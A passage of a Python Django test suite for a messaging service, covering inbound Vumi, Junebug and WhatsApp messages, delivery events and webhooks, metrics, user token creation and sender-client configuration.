        self.assertEqual(d.helper_metadata, {})
    @responses.activate
    def test_create_inbound_data_unknown_msisdn(self):
        """
        When there is an inbound message created, with an msisdn that doesn't
        exist in the identity store, we should create a new identity for that
        address in the identity store.
        """
        self.add_metrics_response()
        # count=0 -> the identity search finds nothing, forcing a create.
        self.add_identity_search_response("+27820000020", "0c03d360", 0)
        self.add_create_identity_response("0c03d360", "+27820000020")
        existing_outbound = self.make_outbound()
        out = Outbound.objects.get(pk=existing_outbound)
        message_id = str(uuid.uuid4())
        post_inbound = {
            "message_id": message_id,
            "in_reply_to": out.vumi_message_id,
            "to_addr": "+27820000123",
            "from_addr": "+27820000020",
            "content": "Call delivered",
            "transport_name": "test_voice",
            "transport_type": "voice",
            "helper_metadata": {},
        }
        with patch.object(ConcurrencyLimiter, "decr_message_count") as mock_method:
            response = self.client.post(
                "/api/v1/inbound/VUMI_TEXT/",
                json.dumps(post_inbound),
                content_type="application/json",
            )
            mock_method.assert_not_called()
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)
        d = Inbound.objects.last()
        self.assertIsNotNone(d.id)
        self.assertEqual(d.message_id, message_id)
        self.assertEqual(d.to_addr, "+27820000123")
        self.assertEqual(d.from_addr, "")
        self.assertEqual(d.from_identity, "0c03d360")
        self.assertEqual(d.content, "Call delivered")
        self.assertEqual(d.transport_name, "test_voice")
        self.assertEqual(d.transport_type, "voice")
        self.assertEqual(d.helper_metadata, {})
    @responses.activate
    def test_create_inbound_data_with_channel_vumi(self):
        """
        When we create an inbound message, the specific channel that the
        URL is linked to should be set on the message.
        """
        self.add_metrics_response()
        self.add_identity_search_response("+27820000020", "0c03d360")
        existing_outbound = self.make_outbound()
        out = Outbound.objects.get(pk=existing_outbound)
        # Give the outbound a send time so the limiter has a slot to free.
        out.last_sent_time = out.created_at
        out.save()
        message_id = str(uuid.uuid4())
        post_inbound = {
            "message_id": message_id,
            "in_reply_to": out.vumi_message_id,
            "to_addr": "+27820000123",
            "from_addr": "+27820000020",
            "content": "Call delivered",
            "transport_name": "test_voice",
            "transport_type": "voice",
            "helper_metadata": {},
            "session_event": "close",
        }
        channel = Channel.objects.get(channel_id="VUMI_VOICE")
        with patch.object(ConcurrencyLimiter, "decr_message_count") as mock_method:
            response = self.client.post(
                "/api/v1/inbound/VUMI_VOICE/",
                json.dumps(post_inbound),
                content_type="application/json",
            )
            mock_method.assert_called_once_with(channel, out.created_at)
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)
        d = Inbound.objects.last()
        self.assertIsNotNone(d.id)
        self.assertEqual(d.message_id, message_id)
        self.assertEqual(d.to_addr, "+27820000123")
        self.assertEqual(d.from_addr, "")
        self.assertEqual(d.from_identity, "0c03d360")
        self.assertEqual(d.content, "Call delivered")
        self.assertEqual(d.transport_name, "test_voice")
        self.assertEqual(d.transport_type, "voice")
        # session_event from the payload is folded into helper_metadata.
        self.assertEqual(d.helper_metadata, {"session_event": "close"})
@responses.activate
def test_create_inbound_data_with_channel_junebug(self):
    """
    When an inbound message is created from Junebug, it should set the
    channel specified in the URL as the channel on the inbound message.
    """
    # NOTE(review): despite the docstring, this test posts the same
    # Vumi-style payload to the same VUMI_VOICE URL as the test above, so
    # it does not currently exercise a Junebug channel. Confirm the intent
    # and point it at a JUNE_* channel / Junebug payload shape if so.
    self.add_metrics_response()
    self.add_identity_search_response("+27820000020", "0c03d360")
    existing_outbound = self.make_outbound()
    out = Outbound.objects.get(pk=existing_outbound)
    out.last_sent_time = out.created_at
    out.save()
    message_id = str(uuid.uuid4())
    post_inbound = {
        "message_id": message_id,
        "in_reply_to": out.vumi_message_id,
        "to_addr": "+27820000123",
        "from_addr": "+27820000020",
        "content": "Call delivered",
        "transport_name": "test_voice",
        "transport_type": "voice",
        "helper_metadata": {},
        "session_event": "close",
    }
    channel = Channel.objects.get(channel_id="VUMI_VOICE")
    with patch.object(ConcurrencyLimiter, "decr_message_count") as mock_method:
        response = self.client.post(
            "/api/v1/inbound/VUMI_VOICE/",
            json.dumps(post_inbound),
            content_type="application/json",
        )
        # Closing the session must release the channel's concurrency slot.
        mock_method.assert_called_once_with(channel, out.created_at)
    self.assertEqual(response.status_code, status.HTTP_201_CREATED)
    d = Inbound.objects.last()
    self.assertIsNotNone(d.id)
    self.assertEqual(d.message_id, message_id)
    self.assertEqual(d.to_addr, "+27820000123")
    # Only the resolved identity is stored, not the raw address.
    self.assertEqual(d.from_addr, "")
    self.assertEqual(d.from_identity, "0c03d360")
    self.assertEqual(d.content, "Call delivered")
    self.assertEqual(d.transport_name, "test_voice")
    self.assertEqual(d.transport_type, "voice")
    self.assertEqual(d.helper_metadata, {"session_event": "close"})
@responses.activate
def test_create_inbound_data_with_channel_whatsapp(self):
    """
    An inbound WhatsApp message posted to the WHATSAPP channel endpoint
    should create an Inbound with the correct details.
    """
    self.add_metrics_response()

    # Register a known identity for the WhatsApp sender address.
    sender_identity = str(uuid.uuid4())
    self.add_identity_search_response("+27820000000", sender_identity)

    msg_id = str(uuid.uuid4())
    response = self.client.post(
        "/api/v1/inbound/WHATSAPP/",
        json.dumps(
            {
                "id": msg_id,
                "from": "27820000000",
                "text": {"body": "Test message"},
            }
        ),
        content_type="application/json",
    )

    self.assertEqual(response.status_code, status.HTTP_201_CREATED)
    inbound = Inbound.objects.last()
    self.assertIsNotNone(inbound.id)
    self.assertEqual(inbound.message_id, msg_id)
    self.assertEqual(inbound.from_identity, sender_identity)
    self.assertEqual(inbound.content, "Test message")
def test_update_inbound_data(self):
    """A PATCH to an inbound message should update only the given fields."""
    out = Outbound.objects.get(pk=self.make_outbound())
    inbound_id = self.make_inbound(out.vumi_message_id)

    response = self.client.patch(
        "/api/v1/inbound/%s/" % inbound_id,
        json.dumps({"content": "Opt out"}),
        content_type="application/json",
    )

    self.assertEqual(response.status_code, status.HTTP_200_OK)
    updated = Inbound.objects.get(pk=inbound_id)
    # Only the content changed; all other fields keep their fixture values.
    self.assertEqual(updated.to_addr, "+27820000123")
    self.assertEqual(updated.from_addr, "+27820000020")
    self.assertEqual(updated.content, "Opt out")
    self.assertEqual(updated.transport_name, "test_voice")
    self.assertEqual(updated.transport_type, "voice")
    self.assertEqual(updated.helper_metadata, {})
def test_delete_inbound_data(self):
    """A DELETE on an inbound message should remove it entirely."""
    out = Outbound.objects.get(pk=self.make_outbound())
    inbound_id = self.make_inbound(out.vumi_message_id)

    response = self.client.delete(
        "/api/v1/inbound/%s/" % inbound_id, content_type="application/json"
    )

    self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
    self.assertEqual(Inbound.objects.filter(id=inbound_id).count(), 0)
@patch("message_sender.views.fire_delivery_hook")
def test_event_ack(self, mock_hook):
    """An ack event marks the outbound delivered and fires the hook once."""
    outbound_id = self.make_outbound()
    outbound = Outbound.objects.get(pk=outbound_id)

    event = {
        "message_type": "event",
        "event_id": "b04ec322fc1c4819bc3f28e6e0c69de6",
        "event_type": "ack",
        "user_message_id": outbound.vumi_message_id,
        "helper_metadata": {},
        "timestamp": "2015-10-28 16:19:37.485612",
        "sent_message_id": "external-id",
    }
    response = self.client.post(
        "/api/v1/events", json.dumps(event), content_type="application/json"
    )
    self.assertEqual(response.status_code, status.HTTP_200_OK)

    # Re-fetch to pick up the changes made by the view.
    outbound = Outbound.objects.get(pk=outbound_id)
    self.assertEqual(outbound.delivered, True)
    self.assertEqual(outbound.attempts, 1)
    self.assertEqual(outbound.metadata["ack_timestamp"], "2015-10-28 16:19:37.485612")
    # An ack must not trigger a re-send of the message.
    self.assertEqual(
        False,
        self.check_logs(
            "Message: 'Simple outbound message' sent to '+27820000123'"
        ),
    )
    mock_hook.assert_called_once_with(outbound)
@patch("message_sender.views.fire_delivery_hook")
def test_event_delivery_report(self, mock_hook):
    """A delivery report marks the outbound delivered and fires the hook."""
    outbound_id = self.make_outbound()
    outbound = Outbound.objects.get(pk=outbound_id)

    event = {
        "message_type": "event",
        "event_id": "b04ec322fc1c4819bc3f28e6e0c69de6",
        "event_type": "delivery_report",
        "user_message_id": outbound.vumi_message_id,
        "helper_metadata": {},
        "timestamp": "2015-10-28 16:20:37.485612",
        "sent_message_id": "external-id",
    }
    response = self.client.post(
        "/api/v1/events", json.dumps(event), content_type="application/json"
    )
    self.assertEqual(response.status_code, status.HTTP_200_OK)

    # Re-fetch to pick up the changes made by the view.
    outbound = Outbound.objects.get(pk=outbound_id)
    self.assertEqual(outbound.delivered, True)
    self.assertEqual(outbound.attempts, 1)
    self.assertEqual(
        outbound.metadata["delivery_timestamp"], "2015-10-28 16:20:37.485612"
    )
    # A delivery report must not trigger a re-send of the message.
    self.assertEqual(
        False,
        self.check_logs(
            "Message: 'Simple outbound message' sent to '+27820000123'"
        ),
    )
    mock_hook.assert_called_once_with(outbound)
@responses.activate
@patch("message_sender.views.fire_delivery_hook")
def test_event_nack_first(self, mock_hook):
    """
    A nack for a message that still has attempts left should increment the
    attempt count and re-send the message.
    """
    self.add_metrics_response()
    existing = self.make_outbound()
    d = Outbound.objects.get(pk=existing)
    # Re-attach the post_save handler so the retry actually fires the send
    # action (and therefore produces the log line asserted below).
    post_save.connect(
        psh_fire_msg_action_if_new,
        sender=Outbound,
        dispatch_uid="psh_fire_msg_action_if_new",
    )
    nack = {
        "message_type": "event",
        "event_id": "b04ec322fc1c4819bc3f28e6e0c69de6",
        "event_type": "nack",
        "nack_reason": "no answer",
        "user_message_id": d.vumi_message_id,
        "helper_metadata": {},
        "timestamp": "2015-10-28 16:20:37.485612",
        "sent_message_id": "external-id",
    }
    response = self.client.post(
        "/api/v1/events", json.dumps(nack), content_type="application/json"
    )
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    c = Outbound.objects.get(pk=existing)
    self.assertEqual(c.delivered, False)
    # One retry has been consumed.
    self.assertEqual(c.attempts, 2)
    self.assertEqual(c.metadata["nack_reason"], "no answer")
    # The re-send must have been logged.
    self.assertEqual(
        True,
        self.check_logs(
            "Message: 'Simple outbound message' sent to '+27820000123' "
            "[session_event: new]"
        ),
    )
    mock_hook.assert_called_once_with(d)
    # TODO: Bring metrics back
    # self.assertEquals(
    #     True,
    #     self.check_logs("Metric: 'vumimessage.tries' [sum] -> 1"))
@responses.activate
def test_event_nack_last(self):
    """
    A nack for a message that has already used all of its send attempts
    should not be retried again.
    """
    self.add_metrics_response()
    # Be assured this is last message attempt
    outbound_message = {
        "to_addr": "+27820000123",
        "vumi_message_id": "08b34de7-c6da-4853-a74d-9458533ed169",
        "content": "Simple outbound message",
        "delivered": False,
        "attempts": 3,
        "metadata": {},
    }
    failed = Outbound.objects.create(**outbound_message)
    failed.last_sent_time = failed.created_at
    failed.save()
    # Re-attach the post_save handler so a retry (if one incorrectly
    # happened) would produce the log line asserted absent below.
    post_save.connect(
        psh_fire_msg_action_if_new,
        sender=Outbound,
        dispatch_uid="psh_fire_msg_action_if_new",
    )
    nack = {
        "message_type": "event",
        "event_id": "b04ec322fc1c4819bc3f28e6e0c69de6",
        "event_type": "nack",
        "nack_reason": "no answer",
        "user_message_id": failed.vumi_message_id,
        "helper_metadata": {},
        "timestamp": "2015-10-28 16:20:37.485612",
        "sent_message_id": "external-id",
    }
    response = self.client.post(
        "/api/v1/events", json.dumps(nack), content_type="application/json"
    )
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    d = Outbound.objects.get(pk=failed.id)
    self.assertEqual(d.delivered, False)
    self.assertEqual(d.attempts, 3)  # not moved on as last attempt passed
    self.assertEqual(d.metadata["nack_reason"], "no answer")
    # Fix: the two string fragments previously lacked the space between
    # "...'" and "[session_event...", so this assertion could never match
    # the real log line and passed vacuously. The corrected string matches
    # the one checked in test_event_nack_first.
    self.assertEqual(
        False,
        self.check_logs(
            "Message: 'Simple outbound message' sent to '+27820000123' "
            "[session_event: new]"
        ),
    )
    # TODO: Bring metrics back
    # self.assertEquals(
    #     False,
    #     self.check_logs("Metric: 'vumimessage.tries' [sum] -> 1"))
    # self.assertEquals(
    #     True,
    #     self.check_logs("Metric: 'vumimessage.maxretries' [sum] -> 1"))
@responses.activate
def test_fire_delivery_hook_max_retries_not_reached(self):
    """
    While the message still has send attempts left, the delivery web hook
    should not be fired.
    """
    responses.add(
        responses.POST,
        "http://example.com",
        status=200,
        content_type="application/json",
    )
    Hook.objects.create(
        user=self.user,
        event="outbound.delivery_report",
        target="http://example.com",
    )
    outbound = Outbound.objects.get(pk=self.make_outbound())

    fire_delivery_hook(outbound)

    # No HTTP call may have been made to the hook target.
    self.assertEqual(len(responses.calls), 0)
@responses.activate
def test_fire_delivery_hook_max_retries_reached(self):
    """
    Once the message has exhausted its attempts, the delivery web hook
    should be called with the failure details.
    """
    responses.add(
        responses.POST,
        "http://example.com",
        status=200,
        content_type="application/json",
    )
    hook = Hook.objects.create(
        user=self.user,
        event="outbound.delivery_report",
        target="http://example.com",
    )
    outbound = Outbound.objects.get(pk=self.make_outbound())
    outbound.attempts = 3
    outbound.save()

    fire_delivery_hook(outbound)

    # Exactly one request must have gone to the hook target.
    self.assertEqual(len(responses.calls), 1)
    payload = json.loads(responses.calls[0].request.body)
    self.assertEqual(
        payload["hook"], {"id": hook.id, "event": hook.event, "target": hook.target}
    )
    self.assertEqual(
        payload["data"],
        {
            "delivered": False,
            "to_addr": outbound.to_addr,
            "outbound_id": str(outbound.id),
            "identity": outbound.to_identity,
        },
    )
@responses.activate
def test_fire_delivery_hook_when_delivered(self):
    """
    When the message has been delivered, the delivery web hook should be
    called with the success details.
    """
    responses.add(
        responses.POST,
        "http://example.com",
        status=200,
        content_type="application/json",
    )
    hook = Hook.objects.create(
        user=self.user,
        event="outbound.delivery_report",
        target="http://example.com",
    )
    outbound = Outbound.objects.get(pk=self.make_outbound())
    outbound.delivered = True
    outbound.save()

    fire_delivery_hook(outbound)

    # Exactly one request must have gone to the hook target.
    self.assertEqual(len(responses.calls), 1)
    payload = json.loads(responses.calls[0].request.body)
    self.assertEqual(
        payload["hook"], {"id": hook.id, "event": hook.event, "target": hook.target}
    )
    self.assertEqual(
        payload["data"],
        {
            "delivered": True,
            "to_addr": outbound.to_addr,
            "outbound_id": str(outbound.id),
            "identity": outbound.to_identity,
        },
    )
class TestJunebugMessagesAPI(AuthenticatedAPITestCase):
    """Tests for the Junebug-specific event and inbound-message endpoints."""

    def test_event_missing_fields(self):
        """
        If there are missing fields in the request, an error response should
        be returned.
        """
        response = self.client.post(
            "/api/v1/events/junebug", json.dumps({}), content_type="application/json"
        )
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    def test_event_no_message(self):
        """
        If we cannot find the message for the event, an error response should
        be returned.
        """
        ack = {
            "event_type": "submitted",
            "message_id": "bad-message-id",
            "channel-id": "channel-uuid-1234",
            "timestamp": "2015-10-28 16:19:37.485612",
            "event_details": {},
        }
        response = self.client.post(
            "/api/v1/events/junebug", json.dumps(ack), content_type="application/json"
        )
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    @patch("message_sender.views.fire_delivery_hook")
    def test_event_ack(self, mock_hook):
        """A submitted event should update the message object accordingly."""
        existing = self.make_outbound()
        d = Outbound.objects.get(pk=existing)
        ack = {
            "event_type": "submitted",
            "message_id": d.vumi_message_id,
            "channel-id": "channel-uuid-1234",
            "timestamp": "2015-10-28 16:19:37.485612",
            "event_details": {},
        }
        response = self.client.post(
            "/api/v1/events/junebug", json.dumps(ack), content_type="application/json"
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        # Re-fetch to pick up changes made by the view.
        d = Outbound.objects.get(pk=existing)
        self.assertEqual(d.delivered, True)
        self.assertEqual(d.attempts, 1)
        self.assertEqual(d.metadata["ack_timestamp"], "2015-10-28 16:19:37.485612")
        # An ack must not trigger a re-send of the message.
        self.assertEqual(
            False,
            self.check_logs(
                "Message: 'Simple outbound message' sent to '+27820000123'"
            ),
        )
        mock_hook.assert_called_once_with(d)

    @responses.activate
    @patch("message_sender.views.fire_delivery_hook")
    def test_event_nack(self, mock_hook):
        """
        A rejected event should retry and update the message object accordingly
        """
        self.add_metrics_response()
        existing = self.make_outbound()
        d = Outbound.objects.get(pk=existing)
        # Re-attach the post_save handler so the retry actually fires the
        # send action (and logs the line asserted below).
        post_save.connect(
            psh_fire_msg_action_if_new,
            sender=Outbound,
            dispatch_uid="psh_fire_msg_action_if_new",
        )
        nack = {
            "event_type": "rejected",
            "message_id": d.vumi_message_id,
            "channel-id": "channel-uuid-1234",
            "timestamp": "2015-10-28 16:19:37.485612",
            "event_details": {"reason": "No answer"},
        }
        response = self.client.post(
            "/api/v1/events/junebug", json.dumps(nack), content_type="application/json"
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        c = Outbound.objects.get(pk=existing)
        self.assertEqual(c.delivered, False)
        # One retry has been consumed.
        self.assertEqual(c.attempts, 2)
        # For Junebug the whole event_details dict is stored as the reason.
        self.assertEqual(c.metadata["nack_reason"], {"reason": "No answer"})
        self.assertEqual(
            True,
            self.check_logs(
                "Message: 'Simple outbound message' sent to '+27820000123' "
                "[session_event: new]"
            ),
        )
        mock_hook.assert_called_once_with(d)

    @patch("message_sender.views.fire_delivery_hook")
    def test_event_delivery_succeeded(self, mock_hook):
        """A successful delivery should update the message accordingly."""
        existing = self.make_outbound()
        d = Outbound.objects.get(pk=existing)
        dr = {
            "event_type": "delivery_succeeded",
            "message_id": d.vumi_message_id,
            "channel-id": "channel-uuid-1234",
            "timestamp": "2015-10-28 16:19:37.485612",
            "event_details": {},
        }
        response = self.client.post(
            "/api/v1/events/junebug", json.dumps(dr), content_type="application/json"
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        d = Outbound.objects.get(pk=existing)
        self.assertEqual(d.delivered, True)
        self.assertEqual(d.attempts, 1)
        self.assertEqual(d.metadata["delivery_timestamp"], "2015-10-28 16:19:37.485612")
        # A delivery report must not trigger a re-send.
        self.assertEqual(
            False,
            self.check_logs(
                "Message: 'Simple outbound message' sent to '+27820000123'"
            ),
        )
        mock_hook.assert_called_once_with(d)

    @responses.activate
    @patch("message_sender.views.fire_delivery_hook")
    def test_event_delivery_failed(self, mock_hook):
        """
        A failed delivery should retry and update the message accordingly.
        """
        self.add_metrics_response()
        existing = self.make_outbound()
        d = Outbound.objects.get(pk=existing)
        dr = {
            "event_type": "delivery_failed",
            "message_id": d.vumi_message_id,
            "channel-id": "channel-uuid-1234",
            "timestamp": "2015-10-28 16:19:37.485612",
            "event_details": {},
        }
        response = self.client.post(
            "/api/v1/events/junebug", json.dumps(dr), content_type="application/json"
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        d = Outbound.objects.get(pk=existing)
        self.assertEqual(d.delivered, False)
        self.assertEqual(d.attempts, 2)
        self.assertEqual(d.metadata["delivery_failed_reason"], {})
        self.assertEqual(
            False,
            self.check_logs(
                "Message: 'Simple outbound message' sent to '+27820000123'"
            ),
        )
        mock_hook.assert_called_once_with(d)

    @responses.activate
    def test_create_inbound_junebug_message(self):
        """
        If Junebug send an inbound message to the inbound endpoint, then a
        new Inbound should be created with the specified parameters.
        """
        self.add_metrics_response()
        existing_outbound = self.make_outbound()
        out = Outbound.objects.get(pk=existing_outbound)
        out.last_sent_time = out.created_at
        out.save()
        message_id = str(uuid.uuid4())
        # Junebug inbound payload shape: "reply_to"/"to"/"from"/"channel_id"
        # rather than the Vumi-style field names.
        post_inbound = {
            "message_id": message_id,
            "reply_to": "test_id",
            "to": "0.0.0.0:9001",
            "from": out.to_addr,
            "content": "Call delivered",
            "channel_id": "test_voice",
            "channel_data": {"session_event": "close"},
        }
        self.add_identity_search_response(out.to_addr, "0c03d360")
        response = self.client.post(
            "/api/v1/inbound/",
            json.dumps(post_inbound),
            content_type="application/json",
        )
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)
        d = Inbound.objects.last()
        self.assertIsNotNone(d.id)
        self.assertEqual(d.message_id, message_id)
        self.assertEqual(d.to_addr, "0.0.0.0:9001")
        # The raw address is dropped in favour of the resolved identity.
        self.assertEqual(d.from_addr, "")
        self.assertEqual(d.from_identity, "0c03d360")
        self.assertEqual(d.content, "Call delivered")
        self.assertEqual(d.transport_name, "test_voice")
        self.assertEqual(d.transport_type, None)
        self.assertEqual(d.helper_metadata, {"session_event": "close"})

    @responses.activate
    def test_create_inbound_junebug_unknown_msisdn(self):
        """
        If Junebug sends a new inbound message to the inbound endpoint, for
        an address that doesn't exist in the identity store, then a new
        identity should be created for that address.
        """
        # NOTE(review): add_identity_search_response registers a matching
        # identity here exactly like the test above, so it is unclear this
        # exercises the "unknown msisdn -> create identity" path — confirm
        # the search stub returns an empty result before the create stub
        # is consulted.
        self.add_metrics_response()
        existing_outbound = self.make_outbound()
        out = Outbound.objects.get(pk=existing_outbound)
        out.last_sent_time = out.created_at
        out.save()
        message_id = str(uuid.uuid4())
        post_inbound = {
            "message_id": message_id,
            "reply_to": "test_id",
            "to": "0.0.0.0:9001",
            "from": out.to_addr,
            "content": "Call delivered",
            "channel_id": "test_voice",
            "channel_data": {"session_event": "close"},
        }
        self.add_identity_search_response(out.to_addr, "0c03d360")
        self.add_create_identity_response("0c03d360", out.to_addr)
        response = self.client.post(
            "/api/v1/inbound/",
            json.dumps(post_inbound),
            content_type="application/json",
        )
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)
        d = Inbound.objects.last()
        self.assertIsNotNone(d.id)
        self.assertEqual(d.message_id, message_id)
        self.assertEqual(d.to_addr, "0.0.0.0:9001")
        self.assertEqual(d.from_addr, "")
        self.assertEqual(d.from_identity, "0c03d360")
        self.assertEqual(d.content, "Call delivered")
        self.assertEqual(d.transport_name, "test_voice")
        self.assertEqual(d.transport_type, None)
        self.assertEqual(d.helper_metadata, {"session_event": "close"})
class TestWhatsAppMessagesAPI(AuthenticatedAPITestCase):
    """Tests for sending WhatsApp HSM (template) messages."""

    @responses.activate
    def test_whatsapp_custom_hsm(self):
        """
        If we send a message with a template key in the metadata, it should
        send an HSM to the WhatsApp API with the parameters specified in the metadata
        """
        responses.add(
            method=responses.POST,
            url="http://example.com/v1/messages",
            json={"messages": [{"id": "message-id"}]},
        )
        self.add_metrics_response()
        # get_client is mocked for every test in this suite; restore the real
        # implementation for the duration of this test only. patch.object
        # guarantees the mock is reinstated even when an assertion below
        # fails — the previous manual save/restore leaked the real client
        # into subsequent tests on failure.
        with patch.object(SendMessage, "get_client", get_client_original):
            response = self.client.post(
                reverse("outbound-list"),
                {
                    "to_identity": "identity-uuid",
                    "to_addr": "+27820001001",
                    "content": "ignore",
                    "channel": "WHATSAPP",
                    "metadata": {
                        "template": {
                            "name": "sbm",
                            "language": "eng_ZA",
                            "variables": ["variable1", "variable2"],
                        }
                    },
                },
                format="json",
            )
            self.assertEqual(response.status_code, status.HTTP_201_CREATED)
            # Find the request made to the WhatsApp API (other stubbed hosts
            # may also have been called).
            [call] = list(
                filter(lambda c: "example.com" in c.request.url, responses.calls)
            )
            request = call.request
            self.assertEqual(request.headers["Authorization"], "Bearer http-api-token")
            self.assertEqual(
                json.loads(request.body),
                {
                    "to": "27820001001",
                    "type": "hsm",
                    "hsm": {
                        "namespace": "whatsapp:hsm:test",
                        "element_name": "sbm",
                        "language": {"policy": "deterministic", "code": "eng_ZA"},
                        "localizable_params": [
                            {"default": "variable1"},
                            {"default": "variable2"},
                        ],
                    },
                },
            )
class TestMetricsAPI(AuthenticatedAPITestCase):
    """Tests for the metrics listing and triggering endpoints."""

    def test_metrics_read(self):
        """The metrics endpoint should list every available metric."""
        response = self.client.get("/api/metrics/", content_type="application/json")
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        expected_metrics = [
            "vumimessage.tries.sum",
            "vumimessage.maxretries.sum",
            "vumimessage.obd.tries.sum",
            "message.failures.sum",
            "message.sent.sum",
            "sender.send_message.connection_error.sum",
            "sender.send_message.http_error.400.sum",
            "sender.send_message.http_error.401.sum",
            "sender.send_message.http_error.403.sum",
            "sender.send_message.http_error.404.sum",
            "sender.send_message.http_error.500.sum",
            "sender.send_message.timeout.sum",
        ]
        self.assertEqual(response.data["metrics_available"], expected_metrics)

    @responses.activate
    def test_post_metrics(self):
        """POSTing to the metrics endpoint should kick off scheduled metrics."""
        # deactivate Testsession for this test
        self.session = None
        responses.add(
            responses.POST,
            "http://metrics-url/metrics/",
            json={"foo": "bar"},
            status=200,
            content_type="application/json",
        )
        response = self.client.post("/api/metrics/", content_type="application/json")
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)
        self.assertEqual(response.data["scheduled_metrics_initiated"], True)
class TestMetrics(AuthenticatedAPITestCase):
    """Tests for the fire_metric celery task."""

    @responses.activate
    def test_direct_fire(self):
        """
        When calling the `fire_metric` task, a call should be make to the
        metrics store with the details provided in the task arguments.
        """
        self.add_metrics_response()

        result = fire_metric.apply_async(
            kwargs={"metric_name": "foo.last", "metric_value": 1}
        )

        last_request = responses.calls[-1].request
        self.check_request(last_request, "POST", data={"foo.last": 1.0})
        self.assertEqual(result.get(), "Fired metric <foo.last> with value <1.0>")
class TestHealthcheckAPI(AuthenticatedAPITestCase):
    """Tests for the service health endpoint."""

    def test_healthcheck_read(self):
        """The health endpoint should report the service and database as up."""
        response = self.client.get("/api/health/", content_type="application/json")
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(response.data["up"], True)
        self.assertEqual(response.data["result"]["database"], "Accessible")
class TestUserCreation(AuthenticatedAPITestCase):
    """Tests for creating users and their auth tokens."""

    def test_create_user_and_token(self):
        """An admin should be able to create a token for a new user."""
        payload = {"email": "test@example.org"}
        response = self.adminclient.post("/api/v1/user/token/", payload)
        token = response.json().get("token", None)
        self.assertIsNotNone(token, "Could not receive authentication token on post.")
        self.assertEqual(
            response.status_code,
            201,
            "Status code on /api/v1/user/token/ was %s (should be 201)."
            % response.status_code,
        )

    def test_create_user_and_token_fail_nonadmin(self):
        """A non-admin user may not create tokens."""
        payload = {"email": "test@example.org"}
        response = self.client.post("/api/v1/user/token/", payload)
        error = response.json().get("detail", None)
        self.assertIsNotNone(error, "Could not receive error on post.")
        self.assertEqual(
            error,
            "You do not have permission to perform this action.",
            "Error message was unexpected: %s." % error,
        )

    def test_create_user_and_token_not_created(self):
        """Requesting a token twice should return the same token."""
        payload = {"email": "test@example.org"}
        first = self.adminclient.post("/api/v1/user/token/", payload)
        token = first.json().get("token", None)
        second = self.adminclient.post("/api/v1/user/token/", payload)
        token2 = second.json().get("token", None)
        self.assertEqual(
            token, token2, "Tokens are not equal, should be the same as not recreated."
        )

    def test_create_user_new_token_nonadmin(self):
        """A freshly created user is not an admin and may not create tokens."""
        payload = {"email": "test@example.org"}
        created = self.adminclient.post("/api/v1/user/token/", payload)
        token = created.json().get("token", None)
        cleanclient = APIClient()
        cleanclient.credentials(HTTP_AUTHORIZATION="Token %s" % token)
        response = cleanclient.post("/api/v1/user/token/", payload)
        error = response.json().get("detail", None)
        # new user should not be admin
        self.assertIsNotNone(error, "Could not receive error on post.")
        self.assertEqual(
            error,
            "You do not have permission to perform this action.",
            "Error message was unexpected: %s." % error,
        )
class TestFormatter(TestCase):
    """Tests for the pluggable voice to_addr formatters."""

    @override_settings(VOICE_TO_ADDR_FORMATTER="message_sender.formatters.noop")
    def test_noop(self):
        """The noop formatter returns the address unchanged."""
        formatter = load_callable(settings.VOICE_TO_ADDR_FORMATTER)
        self.assertEqual(formatter("12345"), "12345")

    @override_settings(
        VOICE_TO_ADDR_FORMATTER="message_sender.formatters.vas2nets_voice"
    )
    def test_vas2nets_voice(self):
        """The vas2nets voice formatter reformats both +-prefixed and bare numbers."""
        formatter = load_callable(settings.VOICE_TO_ADDR_FORMATTER)
        for raw in ("+23456", "23456"):
            self.assertEqual(formatter(raw), "9056")

    @override_settings(
        VOICE_TO_ADDR_FORMATTER="message_sender.formatters.vas2nets_text"
    )
    def test_vas2nets_text(self):
        """The vas2nets text formatter drops only the leading plus sign."""
        formatter = load_callable(settings.VOICE_TO_ADDR_FORMATTER)
        for raw in ("+23456", "23456"):
            self.assertEqual(formatter(raw), "23456")
class TestFactory(TestCase):
    """Tests for MessageClientFactory's channel-to-sender dispatch."""

    def setUp(self):
        super(TestFactory, self).setUp()
        # Create the standard set of test channels used below.
        make_channels()

    # Note: assertIsInstance is used instead of assertTrue(isinstance(...))
    # throughout — behaviourally identical for passing tests, but it reports
    # the actual type on failure.

    def test_create_junebug_text(self):
        """A Junebug text channel yields a configured JunebugApiSender."""
        channel = Channel.objects.get(channel_id="JUNE_TEXT")
        message_sender = MessageClientFactory.create(channel)
        self.assertIsInstance(message_sender, JunebugApiSender)
        self.assertEqual(message_sender.api_url, "http://example.com/")
        self.assertEqual(message_sender.auth, ("username", "password"))

    def test_create_junebug_voice(self):
        """A Junebug voice channel yields a configured JunebugApiSender."""
        channel = Channel.objects.get(channel_id="JUNE_VOICE")
        message_sender = MessageClientFactory.create(channel)
        self.assertIsInstance(message_sender, JunebugApiSender)
        self.assertEqual(message_sender.api_url, "http://example.com/")
        self.assertEqual(message_sender.auth, ("username", "password"))

    def test_create_vumi_text(self):
        """A Vumi text channel yields a configured HttpApiSender."""
        channel = Channel.objects.get(channel_id="VUMI_TEXT")
        message_sender = MessageClientFactory.create(channel)
        self.assertIsInstance(message_sender, HttpApiSender)
        self.assertEqual(message_sender.api_url, "http://example.com/")
        self.assertEqual(message_sender.account_key, "account-key")
        self.assertEqual(message_sender.conversation_key, "conv-key")
        self.assertEqual(message_sender.conversation_token, "account-token")

    def test_create_vumi_voice(self):
        """A Vumi voice channel yields a configured HttpApiSender."""
        channel = Channel.objects.get(channel_id="VUMI_VOICE")
        message_sender = MessageClientFactory.create(channel)
        self.assertIsInstance(message_sender, HttpApiSender)
        self.assertEqual(message_sender.api_url, "http://example.com/")
